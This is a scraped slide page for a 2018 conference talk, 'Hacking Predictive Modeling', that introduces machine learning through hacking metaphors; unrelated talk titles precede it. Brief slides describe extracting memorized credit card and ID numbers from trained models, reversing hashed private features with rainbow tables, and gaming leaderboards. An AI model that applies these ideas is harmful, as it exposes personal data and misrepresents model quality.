FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
SOFTTECHHUB
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
Neo4j
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
Matthew Sinclair
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
Neo4j
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
ThomasParaiso2
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
TIPNGVN2
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 

Recently uploaded (20)

Large Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial ApplicationsLarge Language Model (LLM) and it’s Geospatial Applications
Large Language Model (LLM) and it’s Geospatial Applications
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...GridMate - End to end testing is a critical piece to ensure quality and avoid...
GridMate - End to end testing is a critical piece to ensure quality and avoid...
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 

Hacking Predictive Modeling - RoadSec 2018

  • 1. Hacking Predictive Modeling HJ van Veen - Data Science & InfoSec @ Nubank
  • 2. “Do machine learning like the great [hacker] you are, not like the great machine learning expert you aren’t.” - Zinkevich
 Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
  • 3. Who am I? • Thankful for the opportunity to speak here! • Data scientist & InfoSec analyst at Nubank
 • Competitive data science fanatic
 • Horrible Portuguese speaker (more so with public speaking). Questions and clarifications in English please.
 • @mlwave
  • 4. Disclaimer • These slides are for entertainment, educational and research purposes only.
 • ML is powerful and easy: “Como toda descoberta científica dá mais poderes sobre a natureza, ela pode aumentar o bem ou o mal.” - César Lattes
 • Hacking is fun: But not a substitute for rigorous study and theory. Think of the impact your ML solution has on users.
 
 acm.org/code-of-ethics
  • 5. Scope • This presentation will be all over the place. I don’t know whether you have never trained a model before or are experienced with ML.
 • But I hope this presentation will be interesting for the hackers, makers, creators of all types.
 • Catch me afterwards, if you want to talk about hyper optimization.

  • 7. What is AI? Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)
  • 9. What is AI? Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.) Boy holds baseball bat Cat sits on couch
  • 10. What is AI? • AI grew out of Operations Research after WWII
 • AI consists of many diverse subfields ranging from: Psychology, Neuroscience, Mathematics, Linguistics, Learning Theory, (Quantum) Physics, Computer Science, Information Theory, Statistics, Robotics, Philosophy, Machine Learning.
 • Fight hype. Just replace the word `AI` with `Software`: if the result sounds silly or obvious, then the application of AI usually is too. Power word: “What is your false positive rate?”.

  • 11. What is Machine Learning? • Automatically learn from data
 • Increased business usage: AI, Machine Learning, Software will continue eating the world.
 • Unsupervised learning (Amazon Recommendations). Supervised learning (Spam classification). Reinforcement learning & Self-supervision/Self-play (AlphaGo).
 • Consists of: Engineering, research, data management, domain expertise, analysis, decision science, safety, legal, ethics, UX, monitoring, predictive modeling.
 Why Software Is Eating the World (2016, Andreessen Horowitz)
  • 12. What is Predictive Modeling? • Puts the focus on creating predictions:
 • Use of model, • how to use the data, • how to get good accuracy.
 • Essential for creating a first solution, but only the bare minimum of what goes into Machine Learning at commercial scale. ML competitions are largely about predictive modeling.
  • 13. Useful Paradigms • Functionalism: Input -> Function -> Output
 • Connectionism: Learn from data bottom-up by stacking learning primitives, not top-down.
 • Black Box Learning: Let the machine do the work. Don’t care if I understand what it does.
 • Coding Theory: Error detection and compression
  • 14. Functionalism • Philosophy of Mind: Mental states are defined by how they function, not defined by what they are made of.
 • Function does not depend on the material: You can build a functional mouse trap from wood or metal.
 • Perhaps we can model functional intelligence with computers too?
 

  • 15. Functionalism
 Input -> Transform -> Model -> Output
 Reality -> Sensory Processing -> Mental Modeling -> Behavior
 Data -> Feature Engineering -> Predictive Modeling -> Predictions
  • 16. Connectionism • Philosophy of Mind: Cognition can arise by connecting functional nodes to form a network structure.
 • Artificial Neural Nets & Deep Learning are examples of this approach: Stacking layers of nodes for ever higher-level learning
 • Perhaps we can model intelligence with network architectures too?
 
 Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
  • 17. Connectionism
 Image Demons -> Feature Demons -> Cognitive Demons -> Decision Demons
 Pandemonium: A paradigm for learning. (Selfridge, 1959)
  • 18. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function). "A labrador retriever puppy with tongue hanging out"
  • 19. Black Box ML • View machine learning models as a black box: You only care about what goes in, and what goes out (its function).
 • Don’t care if there is a magical daemon or a complex maths formula in the box.
 • Question then becomes: How to transform the data, and how to parametrize the black box, so as to get the best predictions?
 • Remember: Garbage in - Garbage out (Don’t trust for critical stuff like healthcare or self-driving cars or AGI)
 The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
  • 20. Coding Theory • Coding theory is concerned with effective communication and data integrity
 • Cryptography, Error Correction, Data Compression: All about finding (or hiding) the signal in the noise.
 • Machine Learning is essentially learning to correct errors.
 • Data compression, just like ML, is about finding the most relevant patterns.
  • 21. Coding Theory 1 MegaByte 180 KiloByte
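The link between compression and finding patterns can be seen with a small sketch. It assumes nothing from the slides beyond the idea itself: the byte strings and variable names are made up, and `zlib` merely stands in for whatever compressor the image example used.

```python
import os
import zlib

# Highly patterned data: the same short phrase repeated many times.
patterned = b"signal " * 1000
# Noise: random bytes of the same length, with no pattern to exploit.
noise = os.urandom(len(patterned))

patterned_size = len(zlib.compress(patterned))
noise_size = len(zlib.compress(noise))

print(len(patterned), "->", patterned_size)  # shrinks a lot
print(len(noise), "->", noise_size)          # barely shrinks, may even grow
```

The compressor only wins where there is structure to describe more briefly, which is roughly what a model does when it generalizes from data.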
  • 22. Data • Data can be structured or unstructured. • Tabular data is structured and can more readily be used
 • Text and Sound and Images are unstructured
 • Data can be temporal, for instance: time-series
 • Rarely, data is in the shape of a graph (for instance, relations between gang members)
  • 23. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 Input -> Transform -> Model -> Output
 Data -> Feature Engineering -> Predictive Modeling -> Predictions
  • 24. Feature Engineering • Most data needs to be converted to numbers first
 • Feature engineering:
 • is transforming data into something a model can understand.
 • Creative part of ML with enough tricks to write a book
 • Has a few basic tricks that are enough to get most models to work well.
 Feature Extraction - Foundations and Applications (Guyon et al., 2006)
  • 25. Feature Engineering: Tricks • Categorical Variables
 • One-hot encoding for neural nets:
 Red   -> 1 0 0
 Green -> 0 1 0
 Blue  -> 0 0 1
 • Label encoding for decision trees:
 Red   -> 1
 Green -> 2
 Blue  -> 3
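A minimal sketch of the two encodings, in plain Python so that nothing is hidden. The `colors` column and the fixed category order are assumptions made for illustration; in practice a library encoder would normally do this.

```python
colors = ["Red", "Green", "Blue", "Green"]

# Fix the category order so the encodings are reproducible.
categories = ["Red", "Green", "Blue"]

# Label encoding: each category becomes one integer (1, 2, 3 as on the slide).
label_of = {name: i + 1 for i, name in enumerate(categories)}
label_encoded = [label_of[c] for c in colors]

# One-hot encoding: each category becomes its own 0/1 column.
one_hot_encoded = [[1 if c == name else 0 for name in categories] for c in colors]

print(label_encoded)    # [1, 2, 3, 2]
print(one_hot_encoded)  # [[1, 0, 0], [0, 1, 0], [0, 0, 1], [0, 1, 0]]
```

Label encoding imposes an arbitrary order (Blue > Green > Red), which tree models can split around but linear models and neural nets may misread as a magnitude.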
  • 26. Feature Engineering: Tricks • That’s really (mostly) it!
 • You can now apply the most advanced machine learning algorithms to data and something you want to predict.
 • More advanced feature engineering uses domain expertise, intuition, unsupervised learning/embeddings, and automation (see FeatureTools).
 Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
  • 27. Modeling • A model tries to give accurate predictions for new unseen data.
 • It uses training data together with labels/ground truth/what you want to predict.
 Input -> Transform -> Model -> Output
 Data -> Feature Engineering -> Predictive Modeling -> Predictions
  • 28. Modeling
 Gender | Likes Open Source? | Wants RoadSec ticket?
 1      | 1                  | 1
 0      | 1                  | 1
 1      | 1                  | 0
 0      | 1                  | 1
 1      | 0                  | 0
 0      | 0                  | 0
 1      | 0                  | 0
 0      | 0                  | 0
  • 29. Modeling
 Gender | Likes Open Source? | Wants RoadSec ticket?
 0      | 1                  | ?
 • Gender showed no correlation, and 3/4 of the people who like Open Source also wanted a RoadSec ticket.
 • A good model may predict a probability of 0.75, or a hard prediction of 1.
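The 0.75 can be reproduced by counting. The sketch below assumes the toy table reads row by row as (Gender, Likes Open Source?, Wants RoadSec ticket?); the helper name `ticket_rate` is made up, and a real model would learn this from the data rather than have the rule written by hand.

```python
# Rows are (gender, likes_open_source, wants_ticket), read from the toy table.
rows = [
    (1, 1, 1), (0, 1, 1), (1, 1, 0), (0, 1, 1),
    (1, 0, 0), (0, 0, 0), (1, 0, 0), (0, 0, 0),
]

def ticket_rate(rows, likes_open_source):
    """Fraction of matching training rows that wanted a ticket."""
    matches = [wants for _, likes, wants in rows if likes == likes_open_source]
    return sum(matches) / len(matches)

# New person: gender 0, likes Open Source 1, label unknown.
probability = ticket_rate(rows, likes_open_source=1)
hard_prediction = int(probability >= 0.5)
print(probability, hard_prediction)  # 0.75 1
```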
  • 30. Modeling • Which model do you use for which data?
 • Tabular data: Gradient boosted decision trees (XGBoost)
 • Images: Pre-trained deep neural net (or Detectron)
 • Text: TFIDF -> Logistic Regression (or FastText, ULMFiT, BERT)
 Search for the above terms in combination with “machine learning”
  • 31. Evaluation
 Gender | Likes Open Source? | Wants RoadSec ticket?
 1      | 1                  | 1
 0      | 1                  | 1
 1      | 1                  | 0
 0      | 1                  | 1
 1      | 0                  | 0
 0      | 0                  | 0
 1      | 0                  | 0
 0      | 0                  | 0
  • 32. Evaluation [same table; labels: Train, Predict] The Elements of Statistical Learning (2001, Friedman et al.)
  • 33. Evaluation [same table; labels: Train, Predict]
  • 34. Evaluation
 Predictions | Wants RoadSec ticket?
 1           | 1
 1           | 1
 1           | 0
 1           | 1
 0           | 0
 0           | 0
 0           | 0
 0           | 0
 Accuracy Score: 7/8
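The accuracy score is simply the share of predictions that match the ground truth. A small sketch, assuming the two columns above read pairwise as (prediction, actual); the function name is illustrative.

```python
predictions = [1, 1, 1, 1, 0, 0, 0, 0]
actual      = [1, 1, 0, 1, 0, 0, 0, 0]

def accuracy(predictions, actual):
    """Fraction of predictions that equal the true label."""
    correct = sum(p == a for p, a in zip(predictions, actual))
    return correct / len(actual)

score = accuracy(predictions, actual)
print(score)  # 0.875, i.e. 7/8
```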
  • 35. Optimization • A Python classifier may look like:
 
FactorizationMachineBinaryClassifier(iters=5, learning_rate=0.1, latent_dim=20, radius=0.5,
    lambda_linear=0.0001, lambda_latent=0.0001, normalize='Auto', norm=True,
    caching='Auto', shuffle=True, verbose=True)
 
 • The trick is to tweak these parameters to get a better evaluation. Then stop when any change makes the evaluation worse.
  • 36. Brute Forcing • View hyper parameter optimization as a password cracking task
 • Enumerate or randomly try all possible parameters within a range.
 • Dictionary attack: Use “password dictionary files” with good parameters that worked on other problems. Try these first.
 • This is basically Random Search or Adaptive Search
 Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
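Random search can be sketched in a few lines. Everything here is an assumption for illustration: `evaluate` is a hypothetical stand-in for "train a model and score it on held-out data", and the parameter names and ranges are borrowed loosely from the classifier shown earlier.

```python
import random

def evaluate(learning_rate, latent_dim):
    """Hypothetical stand-in for 'train a model and return its validation score'.

    The score peaks at learning_rate=0.1 and latent_dim=20; a real version
    would fit a model and score it on held-out data.
    """
    return 1.0 - abs(learning_rate - 0.1) - abs(latent_dim - 20) / 100

def random_search(n_trials, seed=0):
    """Sample random parameter settings and keep the best-scoring one."""
    rng = random.Random(seed)
    best_score, best_params = float("-inf"), None
    for _ in range(n_trials):
        params = {
            "learning_rate": 10 ** rng.uniform(-3, 0),  # log-uniform in [0.001, 1]
            "latent_dim": rng.randint(5, 50),
        }
        score = evaluate(**params)
        if score > best_score:
            best_score, best_params = score, params
    return best_score, best_params

best_score, best_params = random_search(n_trials=200)
print(best_score, best_params)
```

A "dictionary attack" variant would evaluate a list of settings that worked on earlier problems before drawing any random ones.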
  • 37. Brute Forcing • How to find the best weights for an average ensemble?
 • Is it differentiable?
 • Which optimizer do we pick?
 • Do we set any regularization?
 • Allow negative weights?
 • How about trying every possible combination of weights and picking the best evaluation? Worst case: you spend 2 hours more compute.
 KazAnova@kaggle
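Brute-forcing ensemble weights might look like the sketch below. The two prediction lists are invented, the grid is deliberately coarse, and for brevity the weights are scored on the same rows they are chosen on; a real run would score them on held-out data.

```python
actual  = [1, 1, 0, 1, 0, 0, 0, 0]
# Hypothetical predicted probabilities from two already-trained models.
model_a = [0.9, 0.6, 0.7, 0.4, 0.2, 0.1, 0.3, 0.6]
model_b = [0.6, 0.4, 0.3, 0.8, 0.4, 0.3, 0.1, 0.2]

def accuracy(probabilities, actual):
    """Accuracy after thresholding probabilities at 0.5."""
    return sum((p >= 0.5) == bool(a) for p, a in zip(probabilities, actual)) / len(actual)

def blend(weight_a):
    """Weighted average of the two models; model_b gets the remaining weight."""
    return [weight_a * a + (1 - weight_a) * b for a, b in zip(model_a, model_b)]

# Try every weight on a coarse grid and keep the best evaluation.
grid = [i / 10 for i in range(11)]
best_weight = max(grid, key=lambda w: accuracy(blend(w), actual))
best_score = accuracy(blend(best_weight), actual)
print(best_weight, best_score)
```

Because the grid includes weights 0 and 1, the blend can never score worse than the better single model on the data it was tuned on.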
  • 38. Brute Forcing • Do we really need to manually train all these models?
 • What would happen if we automatically trained 1000 random models with random data transformations and threw them all into another black box?
 • Out comes a winning Kaggle submission… 
 Kaggle Ensembling Guide (van Veen et al., 2015)
  • 39. Fuzzing with Permutations • View feature interaction expansion/feature selection as a fuzzing task.
 • Train a model and evaluate on test set.
 • For every column in test set:
 • randomly shuffle the column
 • Evaluate the new predictions
 • If evaluation is better with randomly shuffled features, then you can safely discard the column.
 Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
 See Fast.AI tutorial for more on this technique.
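The shuffling procedure can be sketched without any library. The test set reuses the toy RoadSec table (read row by row), and `model_predict` is a hypothetical already-trained model that only looks at the second column; both are assumptions for illustration.

```python
import random

# Toy test set: (gender, likes_open_source) features and wants_ticket labels.
X_test = [[1, 1], [0, 1], [1, 1], [0, 1], [1, 0], [0, 0], [1, 0], [0, 0]]
y_test = [1, 1, 0, 1, 0, 0, 0, 0]

def model_predict(row):
    """Hypothetical already-trained model: it only looks at column 1."""
    return row[1]

def accuracy(X, y):
    return sum(model_predict(row) == label for row, label in zip(X, y)) / len(y)

def permutation_importance(X, y, column, n_repeats=20, seed=0):
    """Average drop in accuracy after shuffling one column of the test set."""
    rng = random.Random(seed)
    baseline = accuracy(X, y)
    drops = []
    for _ in range(n_repeats):
        shuffled = [row[column] for row in X]
        rng.shuffle(shuffled)
        X_perm = [row[:column] + [value] + row[column + 1:]
                  for row, value in zip(X, shuffled)]
        drops.append(baseline - accuracy(X_perm, y))
    return sum(drops) / n_repeats

importances = {
    name: permutation_importance(X_test, y_test, column)
    for column, name in enumerate(["gender", "likes_open_source"])
}
print(importances)
```

A drop of zero (or a negative drop) marks a column the model does not rely on; averaging over several shuffles keeps one lucky permutation from deciding the outcome.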
  • 40. Script kiddies • Use tools developed by others to attack a machine learning problem.
 • The ML community is incentivized to share easily replicable code.
 • Wield the same power as the biggest AI companies in the world.
 • No shame in this! Start somewhere, why not near the top?

  • 41. Warez • Good tools: 
 • allow you to experiment and iterate quickly
 • have an active community contributing new features
 • can be applied to many different problems with similar results.
 • abstract away complexity.

  • 42. Python • Grown to be essential to data science and machine learning. 
 • Learn Python The Hard Way and you have access to an amazing machine learning stack.
 • Then learn “one-- and preferably only one --obvious way to do it.”
 • Python code can read like pseudo-code
 PEP 20 - The Zen of Python (Peters, 2004)
 Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
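  • 43. Python

from sklearn import datasets, ensemble

# Load the bundled iris dataset: feature matrix X and class labels y.
iris = datasets.load_iris()
X = iris.data
y = iris.target

# Fit a gradient boosting classifier with default settings.
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)

# Predicts on the training data itself, so this only demonstrates the API.
p = model.predict(X)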

  • 44. Scikit-Learn • The Metasploit of Machine Learning
 • Uses one API for all models (models are all trained the same way, so learn it only once, and have access to all models)
 • Could get by for a while learning only this library very well
 Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
  • 45. XGBoost • The best for tabular data: 
 • Extremely fast • Very good performance • Can model complex problems • Supports Scikit-Learn API
 • Alternatives: GradientBoostingClassifier, CatBoost, LightGBM. XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
  • 46. Keras • User-friendly wrapper around deep learning libraries such as TensorFlow.
 • Learn Keras and you can work with the latest architectures in deep learning.
 • Alternatives: PyTorch with Fast.AI library
 
 Deep Learning with Python (Chollet, 2017)
  • 47. Vowpal Wabbit • Very fast online learning on data bigger than memory
 • Can be faster and more accurate than Hadoop/Spark
 • Uses cool hashing trick inspired by Bloom filter
 • Support for contextual bandits (automated decision making)
 • Eats raw features:
 1 '10000074 |f category_x_transport emails_cnt:0.0 emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii exclamationmark 2005
 A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
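The hashing trick is what lets raw string features be fed in without building a vocabulary first. The sketch below shows the idea only and is not Vowpal Wabbit's implementation: `zlib.crc32` is a stand-in hash, the 18-bit table size is an assumption, and `hash_features` is a made-up helper.

```python
import zlib

def hash_features(tokens, n_bits=18):
    """Map raw string features to indices in a fixed-size weight vector."""
    size = 2 ** n_bits
    indices = {}
    for token in tokens:
        # "name:value" carries a numeric value; a bare name counts as 1.0.
        name, _, value = token.partition(":")
        index = zlib.crc32(name.encode("utf-8")) % size  # stable across runs
        indices[index] = indices.get(index, 0.0) + (float(value) if value else 1.0)
    return indices

raw = "category_x_transport emails_cnt:0.0 emails_cnt_x_0 exclamationmark 2005".split()
sparse = hash_features(raw)
print(sparse)
```

Two different features can land on the same index; with a large enough table such collisions are usually tolerable, which is the trade that keeps memory use fixed.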
  • 48. Pandas & NumPy & SciPy • Read and manipulate tabular data with Pandas
 • Fast, scalable and supports many types of data
 • Perform vector operations on NumPy (or Numba) arrays
 • Wide support for scientific calculations 
 Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
  • 49. Reverse Engineering • Use frequency tables to reverse engineer the data to its original form.
 • label:TF -> English_word_frequency(IDF(label)) -> Porter_Stemmer(word):TF*IDF
 • feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) -> State:New_York
 Tricks as seen on the Kaggle forums
  • 50. Reverse Engineering • Use model predictions to reverse engineer the training data.
 • Simple brute-force can use fitted language models to retrieve:
 • Credit Card Numbers
 • Social Security Numbers / CPF’s
 • if the model has seen them even once (DL is good at memorization)
 The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
  • 51. Social Engineering • You cannot survive in most businesses with just predictive modeling.
 • Companies don’t hire an AutoML solution, they hire people.
 • The majority of the day-to-day complexity in the chain between data infrastructure and decision makers is social, not technical.
  • 52. Social Engineering • How to gain access to online data science community?
 • Compete together. • Write a cool blog about it. • Write/contribute Open Source projects. • Write tutorials/step-by-step’s.
 • Basically share everything: A 100-line Python script (toy wrapper for Regularized Greedy Forest) could grow to a professional project that you now can use yourself. https://github.com/RGF-team/rgf
  • 53. Operational Security • Business: • Keep pipelines simple • Document & Revisit • Automate, Test & Monitor
 • Competitions: • Loose lips sink ships: Be careful what competitive advantage you share • Show not tell: Save your most powerful models ‘till the very last
  • 54. Hacking Leaderboards • Always wanted to rank #1 on a leaderboard?
 • Wacky Boosting: • Keep changing your submission • use leaderboard feedback to see if it was a good change or a bad change. • Keep good changes. • Repeat until you are #1
 • Will horribly overfit, but can also cause others to overfit! Competing in a data science contest without reading the data (2015, Hardt)
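A simplified reading of the bullets above as hill climbing against the public leaderboard. This is an illustrative sketch, not the exact procedure from the cited post: the labels are simulated, the public/private split sizes are made up, and real competitions cap the number of submissions.

```python
import random

rng = random.Random(0)
n_public, n_private = 50, 50
truth = [rng.randint(0, 1) for _ in range(n_public + n_private)]

def public_score(submission):
    """The only feedback a competitor sees: accuracy on the public rows."""
    return sum(s == t for s, t in zip(submission[:n_public], truth[:n_public])) / n_public

def private_score(submission):
    """Accuracy on the hidden rows that decide the final ranking."""
    return sum(s == t for s, t in zip(submission[n_public:], truth[n_public:])) / n_private

# Start from a random submission and never look at the data.
submission = [rng.randint(0, 1) for _ in truth]
initial_private = private_score(submission)
best = public_score(submission)
for i in range(len(submission)):
    submission[i] ^= 1                 # change one prediction
    score = public_score(submission)   # ask the leaderboard
    if score > best:
        best = score                   # good change: keep it
    else:
        submission[i] ^= 1             # bad or neutral change: undo it

print(public_score(submission), private_score(submission))
```

The public score climbs to a perfect 1.0 while the private score stays wherever the random start left it, which is the overfitting the slide warns about.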
  • 55. Information Snooping • Normally not advisable to use the test set. But for competitions the test set is available, so:
 • Can use semi-supervised learning to extract information from the test set. Use test set for:
 • Frequency (TFIDF) or pre-training language models • Fitting dimensionality reduction • Adding confident predictions as labels to train set github.com/gatapia Guido Tapia
  • 56. Rainbow tables • Sometimes categorical variables are hashed to obscure them.
 • Can use rainbow tables to reverse (truncated) MD5 hash and get the original feature.
 • One time, this was obfuscated ordinals for a job puzzle • One time, this was private data: IP addresses. Oops! • One time, they forgot to obfuscate a misspelled patient name in a psychiatric report. Oops!
